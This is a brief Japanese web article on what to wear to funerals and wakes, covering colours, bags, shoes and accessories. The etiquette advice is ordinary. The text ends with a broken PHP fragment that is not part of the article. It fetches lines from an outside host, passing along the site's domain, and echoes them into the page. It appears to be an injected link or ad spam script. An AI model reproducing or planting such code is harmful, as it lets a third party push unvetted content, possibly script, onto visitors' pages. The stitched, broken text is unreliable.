お葬式の服装マナーについて

不幸な知らせは、突然やってきます。いざという時に慌てずに済むようにお葬式の服装に関するマナーを知っておくべきです。基本は、黒のワンピースやスーツに黒のストッキング、黒の靴です。目上の方の失礼にあたらないようにシンプルなものを心がけます。また、ミニスカートやノースリーブ、胸元が大きく開いた肌の露出の大きい服は、避けるべきです。お通夜は、とりあえず駆けつけるものなので服装も喪服である必要はありません。しかし、グレーや濃紺などの地味な色のものにすべきです。バッグも基本は黒で、布やカーフなど光沢のないシンプルなものが好ましいです。靴もサンダルや光沢のあるエナメル素材、飾りのあるものは避けるべきです。アクセサリーも白や黒のパールやオニキスなどが、無難です。二連ネックレスは、重なることを嫌う弔事ではすべきではありません。結婚指輪は付けてもよいですが、石が付いているものは手のひらに回して隠すなどの配慮をします。

//// $MAX = 5; // ////////////////// $lines = file('http://links-002.com/ad/set.php?dom='.str_replace("www.", "", $_SERVER['HTTP_HOST'])); shuffle($lines); for($i=0;$i<$MAX;$i++){ echo($lines[$i].""); } ?>